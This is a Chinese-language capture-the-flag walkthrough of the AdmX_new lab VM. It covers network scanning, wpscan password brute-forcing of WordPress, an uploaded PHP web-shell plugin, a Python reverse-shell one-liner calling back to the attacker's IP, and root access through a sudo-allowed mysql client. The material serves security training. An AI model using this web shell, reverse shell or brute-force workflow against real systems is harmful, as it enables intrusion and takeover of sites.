靶机: AdmX_new

准备阶段

特殊说明: AdmX_new 内部网络存在一定问题需要调整

本次靶机为 Ubuntu-20.4

  • Ubuntu 网络配置变化

    • net-tools –> iproute2
    • ifup/down 命令系的 /etc/network/interfaces 弃用,转为 netplan 命令和基于 /etc/netplan/*.yaml 的配置文件

    关于 netplan 具体情况:https://netplan.io/reference

  • 靶机网络配置调和【请进行快照后进行下列操作】

    • 在靶机开启过程中【还是黑屏状态,过渡 VirtualBox 动画时】长按 Shift 进入 Grub 引导界面

    • 用上下键移到第二行的恢复模式,按 e

    • ro recovery nomodeset ... 将其改为 rw single init=/bin/bash 当然 ro recovery nomodeset ... 这段后可能会不同,用省略表示一直到行末

    • 修改后使用 Ctrl + X 进入单用户模式,如果不是特别明白可以百度【核心目的是通过单用户模式直接以 root 进入靶机】

    • 使用 ip a 查看网络状态,找到有问题的网卡名称,我的是 enp0s17 不熟悉建议先学习 linux 网卡相关内容

    • 修改网络配置 vim /etc/netplan/*.yaml/etc/netplan/ 下的 yaml 配置文件应该只有一个,我们目标就是它

      # This file describes the network interfaces available on your system
      # For more information, see netplan(5).
      network:
        version: 2
        renderer: networkd
        ethernets:
          enp0s3:
            dhcp4: true
          enp0s17:
            addresses: [192.168.56.200/24]
            gateway4: 192.168.56.1
            nameservers:
              addresses: [192.168.56.100]
      
      • ethernets 下是重点,有两个网卡 enp0s3 是默认不用管,添加的 enp0s17 是我们之前查看的问题网卡名称
      • enp0s17addresses 是我们直接静态分配的 IP
      • gateway4 是网关
      • nameservers 下的 addresses 是 DHCP 服务地址
    • 其中网关和 DHCP 服务地址是 VirtualBox 的 管理 –> 主机虚拟网络管理器 –> 你为靶机在 Host-Only 下使用的那一张网卡,上面有网卡和 DHCP 服务器信息

    • 配置完成 yaml 配置文件后使用命令 netplan apply 使配置生效

  • 关于 Ubuntu-20.4 网络配置详解: https://ubuntu.com/server/docs/network-configuration

打靶流程

发现目标

使用 arp-scan 进行,发现目标 192.168.56.200

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1               
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:53:45:e0       PCS Systemtechnik GmbH
192.168.56.200  08:00:27:a3:25:25       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
  • 使用 -I 参数指定靶机对接的网络是 eth1 需要指定扫描的接口 使用 --interface= 参数,此参数简写 I

使用 nmap 进行端口扫描,目标靶机的 80 端口是开放的,并且服务是 Apache httpd 2.4.41 的 http 服务

┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST
Nmap scan report for 192.168.56.200
Host is up (0.0014s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
  • -A 参数是用来进行操作系统及其版本的探测
  • -T4 参数是可以加快执行速度

探查靶机 http 服务

使用浏览器对 http://192.168.56.200:80/ 进行访问,会发现它只是一个 Apache httpd 2.4.41 的初始化页面,对此我们应该对 http://192.168.56.200:80/ 爬取是否存在隐藏或未知页面,对此我们使用 dirsearch 进行暴力破解网络服务器中的目录和文件

┌──(kali㉿kali)-[~]
└─$ dirsearch --url=192.168.56.200:80/

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                      
                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log

Target: http://192.168.56.200:80/

[19:42:33] Starting: 
[19:42:37] 403 -  279B  - /.htaccess_orig                                  
[19:42:37] 403 -  279B  - /.htaccess.sample
[19:42:37] 403 -  279B  - /.htaccess_extra                                 
[19:42:37] 403 -  279B  - /.ht_wsr.txt
[19:42:37] 403 -  279B  - /.htaccess.orig
[19:42:37] 403 -  279B  - /.htaccessBAK
[19:42:37] 403 -  279B  - /.htaccess_sc                                    
[19:42:37] 403 -  279B  - /.htaccessOLD
[19:42:37] 403 -  279B  - /.htaccess.bak1
[19:42:37] 403 -  279B  - /.htaccess.save
[19:42:37] 403 -  279B  - /.html
[19:42:37] 403 -  279B  - /.htm
[19:42:37] 403 -  279B  - /.htpasswd_test
[19:42:37] 403 -  279B  - /.htpasswds
[19:42:37] 403 -  279B  - /.htaccessOLD2
[19:42:37] 403 -  279B  - /.httr-oauth
[19:42:39] 403 -  279B  - /.php                                            
[19:43:33] 200 -   11KB - /index.html                                       
[19:44:05] 403 -  279B  - /server-status/                                   
[19:44:05] 403 -  279B  - /server-status
[19:44:18] 403 -  279B  - /tools/                                           
[19:44:18] 301 -  316B  - /tools  ->  http://192.168.56.200/tools/          
[19:44:28] 200 -    7KB - /wordpress/wp-login.php                           
[19:44:28] 200 -    8KB - /wordpress/                                       
                                                                             
Task Completed
  • 发现活跃目标 200

    • http://192.168.56.200:80/index.html
    • http://192.168.56.200:80/wordpress/wp-login.php
    • http://192.168.56.200:80/wordpress
  • 和一个特别的 301

    • http://192.168.56.200:80/tools

使用火狐访问 http://192.168.56.200:80/wordpress/ 发现加载时间过长,且明显有缺失,通过查看源码我们可以发现是,html 页面中存在错误指向 192.168.159.145 对此需要使用重定向或替换响应内容,下面使用方法

  • 使用 Burp Suite 进行抓包修改响应实现

  • 使用 浏览器插件 Redirector 重定向实现

    对了此方法可以解决 googleapis 问题,是在访问外国的网站很多技术类网站还在使用 Google Apis 的服务,用过体验应该能发现那些网站存在部分缺失,原因就是国内无法访问 Google Apis 的服务,但是国内存在镜像站,通过此插件重定向就可以间接访问

  • 使用 Mitmproxy 实现

我们使用 Mitmproxy 实现进行实现

  • 确定你的 Kali 否安装 Mitmproxy
  • 命令 mitmproxy 启动,程序
  • ctrl + shift + d 可以将 shell 伪终端上下分屏,上方是 Mitmproxy 的 TUI 界面,下方是 Bash 的 CLI 界面,此操作仅是方便你操作,如果知道请忽略
  • 在 Mitmproxy 中使用 : 键可以进入指令模式,使用 set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/' 即可完成重定向
  • 在 firefox 中使用代理: 手动代理 --> HTTP 代理 代理 IP 地址 127.0.0.1:8080
  • 再次访问 http://192.168.56.200:80/wordpress/

经过一番探索,发现并没有什么特别的,我们使用 dirsearch 对 http://192.168.56.200:80/wordpress/ 进行爆破

┌──(kali㉿kali)-[~/.mitmproxy]
└─$ dirsearch --url=192.168.56.200:80/wordpress                                                 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log

Target: http://192.168.56.200:80/wordpress/

[12:33:30] Starting: 
[12:33:40] 403 -  279B  - /wordpress/.ht_wsr.txt                           
[12:33:41] 403 -  279B  - /wordpress/.htaccess.sample                      
[12:33:41] 403 -  279B  - /wordpress/.htaccess.orig                        
[12:33:41] 403 -  279B  - /wordpress/.htaccess.bak1                        
[12:33:41] 403 -  279B  - /wordpress/.htaccess_extra
[12:33:41] 403 -  279B  - /wordpress/.htaccess.save                        
[12:33:41] 403 -  279B  - /wordpress/.htaccess_orig                        
[12:33:41] 403 -  279B  - /wordpress/.htaccessOLD
[12:33:41] 403 -  279B  - /wordpress/.htaccess_sc
[12:33:41] 403 -  279B  - /wordpress/.htaccessOLD2
[12:33:41] 403 -  279B  - /wordpress/.htaccessBAK                          
[12:33:41] 403 -  279B  - /wordpress/.htm
[12:33:41] 403 -  279B  - /wordpress/.httr-oauth                           
[12:33:41] 403 -  279B  - /wordpress/.htpasswd_test
[12:33:41] 403 -  279B  - /wordpress/.htpasswds
[12:33:41] 403 -  279B  - /wordpress/.html                                 
[12:33:46] 403 -  279B  - /wordpress/.php                                  
[12:33:55] 301 -    0B  - /wordpress/0  ->  http://192.168.56.200/wordpress/0/
[12:34:05] 301 -    0B  - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[12:34:09] 301 -    0B  - /wordpress/New%20folder%20(2)  ->  http://192.168.56.200/wordpress/New%20folder%20(2
[12:34:09] 301 -    0B  - /wordpress/PMA2/index.php  ->  http://192.168.56.200/wordpress/PMA2/
[12:34:10] 301 -    0B  - /wordpress/PMA/index.php  ->  http://192.168.56.200/wordpress/PMA/
[12:34:28] 301 -    0B  - /wordpress/adm/index.php  ->  http://192.168.56.200/wordpress/adm/
[12:34:29] 302 -    0B  - /wordpress/admin  ->  http://192.168.159.145/wordpress/wp-admin/
[12:34:30] 301 -    0B  - /wordpress/admin.  ->  http://192.168.56.200/wordpress/admin
[12:34:31] 302 -    0B  - /wordpress/admin/  ->  http://192.168.159.145/wordpress/wp-admin/
[12:34:32] 301 -    0B  - /wordpress/admin/index.php  ->  http://192.168.56.200/wordpress/admin/
[12:34:33] 301 -    0B  - /wordpress/admin/mysql/index.php  ->  http://192.168.56.200/wordpress/admin/mysql/
[12:34:33] 301 -    0B  - /wordpress/admin/mysql2/index.php  ->  http://192.168.56.200/wordpress/admin/mysql2/
... ... ...
... ... ...                           
[12:38:02] 301 -    0B  - /wordpress/wp-register.php  ->  http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 -  630B  - /wordpress/wp-json/wp/v2/users/                   
[12:38:02] 200 -   96KB - /wordpress/wp-json/                               
[12:38:02] 302 -    0B  - /wordpress/wp-signup.php  ->  http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 -   49KB - /wordpress/wp-includes/                           
[12:38:02] 301 -    0B  - /wordpress/www/phpMyAdmin/index.php  ->  http://192.168.56.200/wordpress/www/phpMyAdmin/
[12:38:03] 301 -    0B  - /wordpress/xampp/phpmyadmin/index.php  ->  http://192.168.56.200/wordpress/xampp/phpmyadmin/
[12:38:03] 405 -   42B  - /wordpress/xmlrpc.php
  • 显然这次大发现,重点关注 200301 状态的内容
  • 在此处需要对 WordPress 有一定了解,才能快速反应出应该重点盘查那些内容
  • 重点是 /wordpress/wp-login.php 的登录界面,登录的是后台管理

此处我们使用针对 WordPress 的工具 wpscan 攻击 http://192.168.56.200/wordpress/ 注意使用 wpscan 需要挂代理

──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080                                          1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov  1 20:20:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 20:20:46 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 53.828 KB
[+] Data Received: 106.023 KB
[+] Memory used: 193.719 MB
[+] Elapsed time: 00:00:19

  • 挂代理是因为之前服务器重定向原因
  • 我们发现 WordPress 版本是 version 5.7.1

测试 wpscan 能正常工作后,使用如下命令工具 wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080 爆破 WordPress 后台密码

┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[proxychains] Strict chain  ...  127.0.0.1:8080  ...  192.168.56.200:80  ...  OK
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov  1 18:41:55 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[SUCCESS] - admin / adam14                                                                                                   
Trying admin / Adm123 Time: 00:00:01 <====                                                 > (20 / 236)  8.47%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: adam14

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 18:42:07 2022
[+] Requests Done: 160
[+] Cached Requests: 30
[+] Data Sent: 49.889 KB
[+] Data Received: 61.955 KB
[+] Memory used: 204.188 MB
[+] Elapsed time: 00:00:12
 
  • 解析命令 proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin

    • proxychains 是代理,这个应该理解
    • -P 参数是爆破密码字典,./password.txt 是密码字典
    • -U 参数是爆破账号,我们指定用户为 admin 毕竟我们要管理权
  • 通过爆破发现关键内容密码为 adam14

    [!] Valid Combinations Found:
    | Username: admin, Password: adam14
    

对于密码字典

  • 建议通过网络查找 高质量弱密码字典
  • 使用字典生成工具 john , hydra , crunch 手动生成 字典量级都比较大
  • 或 Kali 的自带字典【一般有点差强人意】

上面的爆破流程也可以使用 john , hydra 进行但更佳复杂,使用 wpscan 是针对性攻击,对于渗透时根据目标类型使用针对性的攻击能够更高效

对 WordPress 后台页面攻击方法

目前已知 WordPress 版本是 version 5.7.1 且我们进入其后台管理界面

  • media 标签 上传木马
  • Appearance -> Theme Editor 标签 404 模板页面注入
  • 基于 WordPress 插件攻击

在此我们选择 WordPress 插件攻击,因为操作空间更灵活一些

  • 编写插件,并上传安装到 WordPress 激活

    <?php
    /*
    Plugin Name: WebShell
    Plugin URI: https://yunju.blog.csdn.net/
    Description: mu
    Author: myname
    Version: 1.0
    Author URI: https://yunju.blog.csdn.net/
    */
    
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
    ?>
    ?>
    
  • 在浏览器访问 http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id 测试

  • 在本地开启对映监听 netcat -nvlp 4444

  • 经过测试上面存在 python3

  • 尝试使用 Python 反弹 shell

    import os,subprocess,socket
    
    # 创建套接字 
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)      # socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议
    
    # 创建通信
    s.connect(('192.168.56.111', 4444))
    
    # 重定向,保障通信的输入与输出
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    
    # 生成反弹的 shell 
    p=subprocess.call(["/bin/sh","-i"])
    
    # 使用时压缩上面的代码,以便 exec() 执行
    import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
    

    构建 python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • 替代 id 进行执行

也可以使用 metasploit-framework 进行攻击

┌──(kali㉿kali)-[~/workspace]
└─$ netcat -nlvp 4444                                                                                                           1 ⨯
listening on [any] 4444 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$

提权

先确定系统信息,使用命令 uname -a

www-data@wp:/var/www/html/wordpress$ uname -a
uname -a                                                        
Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

既然攻击 WordPress 一定不要忘记查看其配置文件 wp-config.php

www-data@wp:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

define( 'AUTH_KEY',         '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY',  'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY',    '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY',        'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT',        'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT',   '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT',       'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );

$table_prefix = 'wp_';

define( 'WP_DEBUG', false );

if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}
  • 可以直接知道 MySQL 用户 admin 和密码 Wp_Admin#123
  • 但登录会错误

我们还可以在用户目录查看 ls /home 发现一个用户 wpadmin 我们可以尝试猜测密码之前的 adam14

  • 能登录,之后我们可以去 cd ~ 找到第一个 flag
wpadmin@wp:~$ cd ~ && ls
cd ~ && ls
local.txt
wpadmin@wp:~$ cat local.txt
cat local.txt
153495edec1b606c24947b1335998bd9

二次提权

在对 sudo -l 验证时发现,可以无条件执行 /usr/bin/mysql -u root -D wordpress -p

wpadmin@wp:~$ sudo -l
sudo -l
Matching Defaults entries for wpadmin on wp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wpadmin may run the following commands on wp:
    (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
  • 密码猜测依旧是 adam14
  • 进入 mysql 中使用 system 即可执行 root 级命令
  • \! /bin/bash 即可使用 root 的 bash

在 root 用户目录下 proof.txt 最后一个 flag 到此打靶就结束了

原文地址:http://www.cnblogs.com/shadow-/p/16852264.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性